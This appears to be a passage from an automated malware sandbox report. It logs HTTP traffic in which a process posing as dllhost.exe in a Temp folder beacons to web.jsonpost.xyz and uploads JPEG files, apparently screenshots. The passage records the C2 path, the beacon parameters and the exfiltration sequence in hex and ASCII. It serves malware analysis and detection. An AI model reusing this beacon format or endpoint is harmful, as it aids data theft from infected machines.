                                                                                Nov 29, 2024 01:53:13.840536118 CET4944OUTData Raw: 70 32 a4 11 83 d4 73 59 8b 05 cc 52 69 eb a7 59 3d bd 9d 93 4c ef 05 dc de 71 b9 32 a8 47 0e ca a9 f2 94 01 40 00 63 93 9c d3 a4 b7 b8 11 5b c3 a3 db 4f a7 88 2e 63 ba 32 dc 4e 26 91 9e 3c f9 6b 90 aa 02 8c 93 8c 64 93 c9 e8 2b c8 e6 c7 37 75 7e
                                                                                Data Ascii: p2sYRiY=Lq2G@c[O.c2N&<kd+7u~oO,Q2t[tx>$[b((r<M"4`qHbOrZ\ZZ[%t~d r\]Amf+i,6{W.|98QR+KSHS


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                96192.168.2.44987372.52.178.23807608C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 29, 2024 01:53:14.546977043 CET235OUTPOST /sj2vMs/index.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Host: web.jsonpost.xyz
                                                                                Content-Length: 82
                                                                                Cache-Control: no-cache
                                                                                Data Raw: 69 64 3d 31 35 32 31 32 32 34 36 31 32 32 36 26 76 73 3d 32 2e 37 31 26 73 64 3d 39 39 34 35 39 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                Data Ascii: id=152122461226&vs=2.71&sd=99459a&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                97192.168.2.44987472.52.178.23807608C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 29, 2024 01:53:14.598989010 CET195OUTPOST /sj2vMs/index.php?scr=1 HTTP/1.1
                                                                                Content-Type: multipart/form-data; boundary=----b3714476196bb616692c6ded08e7aac7
                                                                                Host: web.jsonpost.xyz
                                                                                Content-Length: 98018
                                                                                Cache-Control: no-cache
                                                                                Nov 29, 2024 01:53:14.599049091 CET156OUTData Raw: 2d 2d 2d 2d 2d 2d 62 33 37 31 34 34 37 36 31 39 36 62 62 36 31 36 36 39 32 63 36 64 65 64 30 38 65 37 61 61 63 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                                                                Data Ascii: ------b3714476196bb616692c6ded08e7aac7Content-Disposition: form-data; name="data"; filename="152122461226.jpg"Content-Type: application/octet-stream
                                                                                Nov 29, 2024 01:53:14.599116087 CET10240OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                                                                Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                                                                Nov 29, 2024 01:53:14.599136114 CET1236OUTData Raw: fb 52 6c f4 34 05 c8 cd 14 e2 ac 3b 53 69 0c 28 a2 8a 00 43 45 14 50 30 a4 34 b4 9c d0 01 45 14 50 00 69 29 68 c5 03 12 8a 28 a0 04 34 52 d1 40 c4 a2 8a 28 01 0d 14 b4 94 00 52 1a 5a 28 18 94 50 68 a0 04 c1 a2 96 8e d4 c6 25 25 2d 21 a0 02 8a 28
                                                                                Data Ascii: Rl4;Si(CEP04EPi)h(4R@(RZ(Ph%%-!(0QE'j)i(4um!(bQEJJu%((PhE!S1E(RwhJ(F)h@RPEE8cKI@0Ri/Z(CE=(4
                                                                                Nov 29, 2024 01:53:14.719383001 CET9888OUTData Raw: de 49 69 75 19 8e 58 ce 08 3d fd c7 b5 6f 43 1f 42 bc b9 20 f5 39 f1 39 6e 23 0f 0e 79 ad 3c 8a b4 77 a3 14 57 61 c0 21 a2 96 92 80 0a 43 4b 45 03 12 8a 28 a0 02 92 96 8a 06 25 21 a5 a2 80 12 83 4b 49 4c 04 a2 96 8a 06 25 25 2d 25 03 0a 4a 5a 28
                                                                                Data Ascii: IiuX=oCB 99n#y<wWa!CKE(%!KIL%%-%JZ((%CE-%%(4P1))h4P1(4Q@RbBRSHhRP1%:JJZ()iJZJ))h))i())JJZ(<^hNZObPhiB9"ByP0%Nih#
                                                                                Nov 29, 2024 01:53:14.719449043 CET4944OUTData Raw: 45 14 50 30 a2 8a 29 00 94 52 d1 40 09 45 14 50 02 1a 0d 2d 14 00 94 51 45 00 25 14 b4 94 c6 14 51 45 00 25 14 b4 53 01 29 29 68 c5 03 42 52 52 d1 40 c4 a2 8a 29 80 51 46 28 e2 80 0c 91 4e 0e 40 a6 d1 8a 60 38 ed 6e ab f9 53 4c 4a 7e eb 63 eb 49
                                                                                Data Ascii: EP0)R@EP-QE%QE%S))hBRR@)QF(N@`8nSLJ~cI9bv1wh(ZiR+qVE6)))hR@4P1(JCKE1EJLS6RRKAqIu%1N%!)P1@%:(RbLP11II
                                                                                Nov 29, 2024 01:53:14.719501019 CET2472OUTData Raw: a9 ad 4c 96 b1 bc 45 ca 4c 57 6a 85 f3 bc cc e1 97 39 40 00 24 82 d8 19 ce b2 d4 6c af 26 37 57 37 e2 04 be d4 1e ca cc 25 82 a6 e6 5d b9 2e 88 e0 22 82 ea 38 dc 4f 27 15 10 b5 be 48 ad 51 66 b5 66 b3 31 fd 9a 79 2d 62 69 a2 f2 db 72 01 21 42 d8
                                                                                Data Ascii: LELWj9@$l&7W7%]."8O'HQff1y-bir!Bp82MCJg9,<AY8~{ejZkL!Ie693"DT`x Y6]P%]P#3)pw;'sd+,BOyXr_U#:#q
                                                                                Nov 29, 2024 01:53:14.719516993 CET2472OUTData Raw: 26 29 31 8a 71 e0 52 1a 56 18 dc 51 c7 34 bf a1 a4 f5 fe 54 58 62 63 23 14 df 7a 79 1c 8c 52 51 61 8d e9 47 bd 3b 14 86 81 88 41 a3 8a 5c 67 ff 00 af 4d ed 4c 35 13 de 8e 73 4e 20 52 1e 28 01 31 8a 00 f7 a7 0c 1f 6a 41 40 c4 23 f9 d3 7f 5a 71 39
                                                                                Data Ascii: &)1qRVQ4TXbc#zyRQaG;A\gML5sN R(1jA@#Zq9j%(HE/GCX/z:GZ\q@/CE!:I@4RENwb|Q@Q@EJ)MQEQE%@CE-QEQERPIKE%Q@Q@P
                                                                                Nov 29, 2024 01:53:14.719594002 CET1236OUTData Raw: b4 50 01 8a 31 45 14 0c 4a 4a 75 25 08 04 a2 8a 51 4c 02 93 14 b4 50 02 77 a2 97 14 94 c6 18 a4 c7 34 b8 a2 98 09 45 2d 14 00 94 98 a5 a3 19 a6 02 52 53 e9 31 45 c6 37 9a 33 ff 00 d6 a5 a3 14 0c 4c e3 a5 2e 73 f7 80 3f 5a 31 48 45 00 21 8e 36 f5
                                                                                Data Ascii: P1EJJu%QLPw4E-RS1E73L.s?Z1HE!6SL00aRbP4 e# UN9JWJw)Lz1Q2tRLS9L|~qAS1I?1EGf&FFi1GzVH#E+`O9!`jp9
                                                                                Nov 29, 2024 01:53:14.719733953 CET2472OUTData Raw: 0f 80 f5 1d 88 88 3c d4 e1 2c 24 b4 1f 7d 3f 81 f9 3f 5e 9d bb 57 9b d7 a9 78 a2 c6 1d 3f c1 77 f1 42 f7 0c a5 e3 62 67 b8 92 66 cf 98 9f c4 ec 4e 38 e9 9c 57 97 57 6e 50 f9 a3 37 e6 78 1c 42 b9 6a 53 5e 42 51 4b 45 7b 07 ce 89 45 29 a4 a0 62 51
                                                                                Data Ascii: <,$}??^Wx?wBbgfN8WWnP7xBjS^BQKE{E)bQKI@QL(0(1PQPIKI@`%(L(4Q@E-%1!4QE))i()))h((QERZ)QE0(Q@PhSH)QERRLb-'z`
                                                                                Nov 29, 2024 01:53:14.839554071 CET7416OUTData Raw: 70 32 a4 11 83 d4 73 59 8b 05 cc 52 69 eb a7 59 3d bd 9d 93 4c ef 05 dc de 71 b9 32 a8 47 0e ca a9 f2 94 01 40 00 63 93 9c d3 a4 b7 b8 11 5b c3 a3 db 4f a7 88 2e 63 ba 32 dc 4e 26 91 9e 3c f9 6b 90 aa 02 8c 93 8c 64 93 c9 e8 2b c8 e6 c7 37 75 7e
                                                                                Data Ascii: p2sYRiY=Lq2G@c[O.c2N&<kd+7u~oO,Q2t[tx>$[b((r<M"4`qHbOrZ\ZZ[%t~d r\]Amf+i,6{W.|98QR+KSHS


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                98192.168.2.44988072.52.178.23807608C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 29, 2024 01:53:15.945132017 CET235OUTPOST /sj2vMs/index.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Host: web.jsonpost.xyz
                                                                                Content-Length: 82
                                                                                Cache-Control: no-cache
                                                                                Data Raw: 69 64 3d 31 35 32 31 32 32 34 36 31 32 32 36 26 76 73 3d 32 2e 37 31 26 73 64 3d 39 39 34 35 39 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                Data Ascii: id=152122461226&vs=2.71&sd=99459a&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                99192.168.2.44988172.52.178.23807608C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 29, 2024 01:53:16.318600893 CET195OUTPOST /sj2vMs/index.php?scr=1 HTTP/1.1
                                                                                Content-Type: multipart/form-data; boundary=----2b8041a10abd63097aaf92c151839ca7
                                                                                Host: web.jsonpost.xyz
                                                                                Content-Length: 98296
                                                                                Cache-Control: no-cache
                                                                                Nov 29, 2024 01:53:16.318648100 CET156OUTData Raw: 2d 2d 2d 2d 2d 2d 32 62 38 30 34 31 61 31 30 61 62 64 36 33 30 39 37 61 61 66 39 32 63 31 35 31 38 33 39 63 61 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                                                                Data Ascii: ------2b8041a10abd63097aaf92c151839ca7Content-Disposition: form-data; name="data"; filename="152122461226.jpg"Content-Type: application/octet-stream
                                                                                Nov 29, 2024 01:53:16.318728924 CET10240OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                                                                Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                                                                Nov 29, 2024 01:53:16.318810940 CET1236OUTData Raw: fb 52 6c f4 34 05 c8 cd 14 e2 ac 3b 53 69 0c 28 a2 8a 00 43 45 14 50 30 a4 34 b4 9c d0 01 45 14 50 00 69 29 68 c5 03 12 8a 28 a0 04 34 52 d1 40 c4 a2 8a 28 01 0d 14 b4 94 00 52 1a 5a 28 18 94 50 68 a0 04 c1 a2 96 8e d4 c6 25 25 2d 21 a0 02 8a 28
                                                                                Data Ascii: Rl4;Si(CEP04EPi)h(4R@(RZ(Ph%%-!(0QE'j)i(4um!(bQEJJu%((PhE!S1E(RwhJ(F)h@RPEE8cKI@0Ri/Z(CE=(4
                                                                                Nov 29, 2024 01:53:16.438729048 CET2472OUTData Raw: de 49 69 75 19 8e 58 ce 08 3d fd c7 b5 6f 43 1f 42 bc b9 20 f5 39 f1 39 6e 23 0f 0e 79 ad 3c 8a b4 77 a3 14 57 61 c0 21 a2 96 92 80 0a 43 4b 45 03 12 8a 28 a0 02 92 96 8a 06 25 21 a5 a2 80 12 83 4b 49 4c 04 a2 96 8a 06 25 25 2d 25 03 0a 4a 5a 28
                                                                                Data Ascii: IiuX=oCB 99n#y<wWa!CKE(%!KIL%%-%JZ((%CE-%%(4P1))h4P1(4Q@RbBRSHhRP1%:JJZ()iJZJ))h))i())JJZ(<^hNZObPhiB9"ByP0%Nih#
                                                                                Nov 29, 2024 01:53:16.438857079 CET4944OUTData Raw: fa 13 57 d0 70 a5 49 47 1d c8 9e 8d 3b 9f 3d c4 f4 e3 2c 17 33 dd 34 73 54 51 45 7e 90 7e 7c 14 51 45 00 15 e8 5f 0b bf e4 5f d4 3f ec 23 27 fe 82 95 e7 b5 e8 5f 0b bf e4 5f d4 3f ec 23 27 fe 82 95 f3 f9 ef fc ba f5 7f 91 f5 fc 2d fc 3c 4f a4 7f
                                                                                Data Ascii: WpIG;=,34sTQE~~|QE__?#'__?#'-<O15_F+4VSNg9=m[HET#r5{CN%Oor/"y{F3K u%y{&3am#vsWFbkbU)#OH46I(
                                                                                Nov 29, 2024 01:53:16.438951969 CET4944OUTData Raw: 61 d6 75 4d 7a e8 4e fa 58 f3 dd ae b9 fb 3c 96 85 48 45 56 e8 78 2a a1 41 c8 38 18 18 e3 30 59 ea 3a bd a5 b6 a5 69 f6 a9 74 b8 b4 e8 84 12 5b 82 52 de 45 8c 79 a1 c8 e2 36 df b9 8e 71 9c 83 d0 d5 98 f4 c4 b6 b9 4b ab 29 e7 b4 b8 4c ed 96 09 0a
                                                                                Data Ascii: auMzNX<HEVx*A80Y:it[REy6qK)L2`5`ziY/3YA;l&]OMZXEY~o*U0n97\"YMUl4K;EFzl`<XJ3vylH;J},s[
                                                                                Nov 29, 2024 01:53:16.439012051 CET4944OUTData Raw: a9 07 fe f9 af 76 85 92 86 ba f3 7f 91 e5 e3 6e f9 f4 d3 95 7e 47 90 51 4b da 92 be d4 fc d8 28 a2 8a 00 cf d5 ff 00 e3 d1 7f eb a0 fe 46 b7 be 1b 43 35 b6 a5 79 ad cb 29 87 4c b2 b7 7f b5 12 32 24 04 70 9e e7 a1 fc 07 ad 63 6a 30 49 71 6e ab 12
                                                                                Data Ascii: vn~GQK(FC5y)L2$pcj0Iqn`8j}3,4!M?.c.0yRW4<veRr")no,5$tu`rt=1xSR]/U)}we7<p+bDmBy?z/P|=5gi
                                                                                Nov 29, 2024 01:53:16.439114094 CET6180OUTData Raw: 26 29 31 8a 71 e0 52 1a 56 18 dc 51 c7 34 bf a1 a4 f5 fe 54 58 62 63 23 14 df 7a 79 1c 8c 52 51 61 8d e9 47 bd 3b 14 86 81 88 41 a3 8a 5c 67 ff 00 af 4d ed 4c 35 13 de 8e 73 4e 20 52 1e 28 01 31 8a 00 f7 a7 0c 1f 6a 41 40 c4 23 f9 d3 7f 5a 71 39
                                                                                Data Ascii: &)1qRVQ4TXbc#zyRQaG;A\gML5sN R(1jA@#Zq9j%(HE/GCX/z:GZ\q@/CE!:I@4RENwb|Q@Q@EJ)MQEQE%@CE-QEQERPIKE%Q@Q@P
                                                                                Nov 29, 2024 01:53:16.559098005 CET4944OUTData Raw: 69 ed 79 b4 08 b7 3e d0 f2 22 bb aa 1c 16 54 24 33 00 41 c9 00 81 83 e8 6a c0 21 94 11 d0 8c d6 5d 8d c6 a3 fd 8f 0e 9b 76 75 48 56 11 2a 20 b3 bf 68 e0 74 76 2e 04 b1 6d 21 c8 2c 46 41 5c 8c 03 d2 b4 d0 6d 8d 57 d0 01 5d f8 1a 95 e7 0f df 2b 58
                                                                                Data Ascii: iy>"T$3Aj!]vuHV* htv.m!,FA\mW]+X:XZu?t:>R3S~HQ:oh.cg11_1Jr2^.x_XyagrK-A1,u-x<ToEs5V;W\} X.bO]:gx.B8
                                                                                Nov 29, 2024 01:53:16.559168100 CET2472OUTData Raw: 72 43 15 cb e9 c6 47 6b 79 30 63 73 92 cb b1 5b 8f 7e 4d 71 e4 10 70 7a d7 a9 49 24 f2 ea 71 ac 90 ea 96 1f 6c 93 6a 93 f6 66 4d e2 32 7b 33 37 dd 43 5c 2f 8a 2d 85 a7 88 6e 61 0e 5f 1b 49 66 00 12 4a 82 7a 00 3b d7 a9 96 e2 aa b9 fb 1a 8e f7 d5
                                                                                Data Ascii: rCGky0cs[~MqpzI$qljfM2{37C\/-na_IfJz;;gfc(p(kik6|e885_h+zw|'SZN"I\cC7J3Jc]F2*'r3_1uUKiV.rwt


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                100192.168.2.44988372.52.178.23807608C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 29, 2024 01:53:17.326968908 CET235OUTPOST /sj2vMs/index.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Host: web.jsonpost.xyz
                                                                                Content-Length: 82
                                                                                Cache-Control: no-cache
                                                                                Data Raw: 69 64 3d 31 35 32 31 32 32 34 36 31 32 32 36 26 76 73 3d 32 2e 37 31 26 73 64 3d 39 39 34 35 39 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                Data Ascii: id=152122461226&vs=2.71&sd=99459a&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0


                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                101192.168.2.44988872.52.178.2380
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 29, 2024 01:53:17.828219891 CET195OUTPOST /sj2vMs/index.php?scr=1 HTTP/1.1
                                                                                Content-Type: multipart/form-data; boundary=----b3714476196bb616692c6ded08e7aac7
                                                                                Host: web.jsonpost.xyz
                                                                                Content-Length: 98018
                                                                                Cache-Control: no-cache
                                                                                Nov 29, 2024 01:53:17.828286886 CET156OUTData Raw: 2d 2d 2d 2d 2d 2d 62 33 37 31 34 34 37 36 31 39 36 62 62 36 31 36 36 39 32 63 36 64 65 64 30 38 65 37 61 61 63 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                                                                Data Ascii: ------b3714476196bb616692c6ded08e7aac7Content-Disposition: form-data; name="data"; filename="152122461226.jpg"Content-Type: application/octet-stream
                                                                                Nov 29, 2024 01:53:17.828366995 CET10240OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                                                                Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                                                                Nov 29, 2024 01:53:17.828418016 CET1236OUTData Raw: fb 52 6c f4 34 05 c8 cd 14 e2 ac 3b 53 69 0c 28 a2 8a 00 43 45 14 50 30 a4 34 b4 9c d0 01 45 14 50 00 69 29 68 c5 03 12 8a 28 a0 04 34 52 d1 40 c4 a2 8a 28 01 0d 14 b4 94 00 52 1a 5a 28 18 94 50 68 a0 04 c1 a2 96 8e d4 c6 25 25 2d 21 a0 02 8a 28
                                                                                Data Ascii: Rl4;Si(CEP04EPi)h(4R@(RZ(Ph%%-!(0QE'j)i(4um!(bQEJJu%((PhE!S1E(RwhJ(F)h@RPEE8cKI@0Ri/Z(CE=(4
                                                                                Nov 29, 2024 01:53:17.948638916 CET2472OUTData Raw: de 49 69 75 19 8e 58 ce 08 3d fd c7 b5 6f 43 1f 42 bc b9 20 f5 39 f1 39 6e 23 0f 0e 79 ad 3c 8a b4 77 a3 14 57 61 c0 21 a2 96 92 80 0a 43 4b 45 03 12 8a 28 a0 02 92 96 8a 06 25 21 a5 a2 80 12 83 4b 49 4c 04 a2 96 8a 06 25 25 2d 25 03 0a 4a 5a 28
                                                                                Data Ascii: IiuX=oCB 99n#y<wWa!CKE(%!KIL%%-%JZ((%CE-%%(4P1))h4P1(4Q@RbBRSHhRP1%:JJZ()iJZJ))h))i())JJZ(<^hNZObPhiB9"ByP0%Nih#
                                                                                Nov 29, 2024 01:53:17.948769093 CET7416OUTData Raw: fa 13 57 d0 70 a5 49 47 1d c8 9e 8d 3b 9f 3d c4 f4 e3 2c 17 33 dd 34 73 54 51 45 7e 90 7e 7c 14 51 45 00 15 e8 5f 0b bf e4 5f d4 3f ec 23 27 fe 82 95 e7 b5 e8 5f 0b bf e4 5f d4 3f ec 23 27 fe 82 95 f3 f9 ef fc ba f5 7f 91 f5 fc 2d fc 3c 4f a4 7f
                                                                                Data Ascii: WpIG;=,34sTQE~~|QE__?#'__?#'-<O15_F+4VSNg9=m[HET#r5{CN%Oor/"y{F3K u%y{&3am#vsWFbkbU)#OH46I(
                                                                                Nov 29, 2024 01:53:17.948934078 CET4944OUTData Raw: 45 14 50 30 a2 8a 29 00 94 52 d1 40 09 45 14 50 02 1a 0d 2d 14 00 94 51 45 00 25 14 b4 94 c6 14 51 45 00 25 14 b4 53 01 29 29 68 c5 03 42 52 52 d1 40 c4 a2 8a 29 80 51 46 28 e2 80 0c 91 4e 0e 40 a6 d1 8a 60 38 ed 6e ab f9 53 4c 4a 7e eb 63 eb 49
                                                                                Data Ascii: EP0)R@EP-QE%QE%S))hBRR@)QF(N@`8nSLJ~cI9bv1wh(ZiR+qVE6)))hR@4P1(JCKE1EJLS6RRKAqIu%1N%!)P1@%:(RbLP11II
                                                                                Nov 29, 2024 01:53:17.949053049 CET6180OUTData Raw: a9 ad 4c 96 b1 bc 45 ca 4c 57 6a 85 f3 bc cc e1 97 39 40 00 24 82 d8 19 ce b2 d4 6c af 26 37 57 37 e2 04 be d4 1e ca cc 25 82 a6 e6 5d b9 2e 88 e0 22 82 ea 38 dc 4f 27 15 10 b5 be 48 ad 51 66 b5 66 b3 31 fd 9a 79 2d 62 69 a2 f2 db 72 01 21 42 d8
                                                                                Data Ascii: LELWj9@$l&7W7%]."8O'HQff1y-bir!Bp82MCJg9,<AY8~{ejZkL!Ie693"DT`x Y6]P%]P#3)pw;'sd+,BOyXr_U#:#q
                                                                                Nov 29, 2024 01:53:17.949053049 CET2472OUTData Raw: 0f 80 f5 1d 88 88 3c d4 e1 2c 24 b4 1f 7d 3f 81 f9 3f 5e 9d bb 57 9b d7 a9 78 a2 c6 1d 3f c1 77 f1 42 f7 0c a5 e3 62 67 b8 92 66 cf 98 9f c4 ec 4e 38 e9 9c 57 97 57 6e 50 f9 a3 37 e6 78 1c 42 b9 6a 53 5e 42 51 4b 45 7b 07 ce 89 45 29 a4 a0 62 51
                                                                                Data Ascii: <,$}??^Wx?wBbgfN8WWnP7xBjS^BQKE{E)bQKI@QL(0(1PQPIKI@`%(L(4Q@E-%1!4QE))i()))h((QERZ)QE0(Q@PhSH)QERRLb-'z`
                                                                                Nov 29, 2024 01:53:18.068763971 CET2472OUTData Raw: 70 32 a4 11 83 d4 73 59 8b 05 cc 52 69 eb a7 59 3d bd 9d 93 4c ef 05 dc de 71 b9 32 a8 47 0e ca a9 f2 94 01 40 00 63 93 9c d3 a4 b7 b8 11 5b c3 a3 db 4f a7 88 2e 63 ba 32 dc 4e 26 91 9e 3c f9 6b 90 aa 02 8c 93 8c 64 93 c9 e8 2b c8 e6 c7 37 75 7e
                                                                                Data Ascii: p2sYRiY=Lq2G@c[O.c2N&<kd+7u~oO,Q2t[tx>$[b((r<M"4`qHbOrZ\ZZ[%t~d r\]Amf+i,6{W.|98QR+KSHS
                                                                                Nov 29, 2024 01:53:18.069006920 CET4944OUTData Raw: 48 d2 29 c1 21 77 6d 0b 90 70 0a 93 8e f9 e6 b6 2e a3 8e 2d 6a f2 d6 de e6 d1 d5 75 28 ec 44 29 33 b3 40 d2 13 e5 ef 24 63 9c 1e 85 b1 d0 e0 f1 59 17 d0 de dd d8 cf 6f 25 95 93 dc 4c 81 1e f7 e7 59 1c 0e ec 03 6c 2d 8e 37 6d cf 7c e7 9a ae 6d b5
                                                                                Data Ascii: H)!wmp.-ju(D)3@$cYo%LYl-7m|m\]jj2ob|w,r:9qqqk=WsyfOknl%G7"($rFml1\\C#32Ac]ic8bmlen(`($I


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                102192.168.2.44988972.52.178.23807608C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 29, 2024 01:53:18.703598976 CET235OUTPOST /sj2vMs/index.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Host: web.jsonpost.xyz
                                                                                Content-Length: 82
                                                                                Cache-Control: no-cache
                                                                                Data Raw: 69 64 3d 31 35 32 31 32 32 34 36 31 32 32 36 26 76 73 3d 32 2e 37 31 26 73 64 3d 39 39 34 35 39 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                Data Ascii: id=152122461226&vs=2.71&sd=99459a&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                103192.168.2.44989072.52.178.23807608C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 29, 2024 01:53:19.484946966 CET196OUTPOST /sj2vMs/index.php?scr=1 HTTP/1.1
                                                                                Content-Type: multipart/form-data; boundary=----5add77a23e85c1c8c456f4525574afb1
                                                                                Host: web.jsonpost.xyz
                                                                                Content-Length: 103478
                                                                                Cache-Control: no-cache
                                                                                Nov 29, 2024 01:53:19.485008955 CET156OUTData Raw: 2d 2d 2d 2d 2d 2d 35 61 64 64 37 37 61 32 33 65 38 35 63 31 63 38 63 34 35 36 66 34 35 32 35 35 37 34 61 66 62 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                                                                Data Ascii: ------5add77a23e85c1c8c456f4525574afb1Content-Disposition: form-data; name="data"; filename="152122461226.jpg"Content-Type: application/octet-stream
                                                                                Nov 29, 2024 01:53:19.485080957 CET10240OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                                                                Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                                                                Nov 29, 2024 01:53:19.485100031 CET1236OUTData Raw: 04 8f 24 83 c4 62 ea cd d8 14 25 66 5b 7d fb 65 dd 8c 6e c3 2a 9c f5 da 0f 39 35 be ca ac 30 c0 1f a8 a4 f2 d0 f5 55 e3 da af 13 97 42 bd 4f 68 dd 9e 9f 83 b9 9e 13 35 9e 1a 97 b3 4a eb 5f c4 a6 35 4d 32 0d 72 ec 5b 99 4e 97 6d 6e 2e 34 f0 62 7c
                                                                                Data Ascii: $b%f[}en*950UBOh5J_5M2r[Nmn.4b|]PALX4"{Yv q1]/_2qoS<9)[kV3o5/eEJXP(=#LGt(n Qn`LKr9B(9=L"'&4E\r
                                                                                Nov 29, 2024 01:53:19.605066061 CET1236OUTData Raw: ff 00 f8 9a 06 59 a2 ab 7d 96 6f f9 fe b8 ff 00 be 63 ff 00 e2 68 fb 34 df f3 fd 71 ff 00 7c c7 ff 00 c4 d0 05 9a 2a b7 d9 a6 ff 00 9f eb 8f fb e6 3f fe 26 8f b3 4d ff 00 3f d7 1f f7 cc 7f fc 4d 00 59 a2 ab 7d 9a 6f f9 fe b8 ff 00 be 63 ff 00 e2
                                                                                Data Ascii: Y}och4q|*?&M?MY}och4q|*f?&@{U{&F/2m#@SNUu)){+BFQ@dR@)O4@E1'zCJN
                                                                                Nov 29, 2024 01:53:19.605119944 CET4944OUTData Raw: 49 4f 90 c2 28 c1 e3 e5 04 9f ae 6a 0f ed bd 47 fe 7e 7f f1 c5 ff 00 0a f9 f9 f1 26 0e 32 71 4a 4f cd 25 fe 67 da d1 e0 2c d2 a4 14 dc a1 1b f4 6d dd 7a da 2d 7e 27 63 45 71 df db 7a 8f fc fc ff 00 e3 8b fe 14 7f 6d ea 3f f3 f3 ff 00 8e 2f f8 54
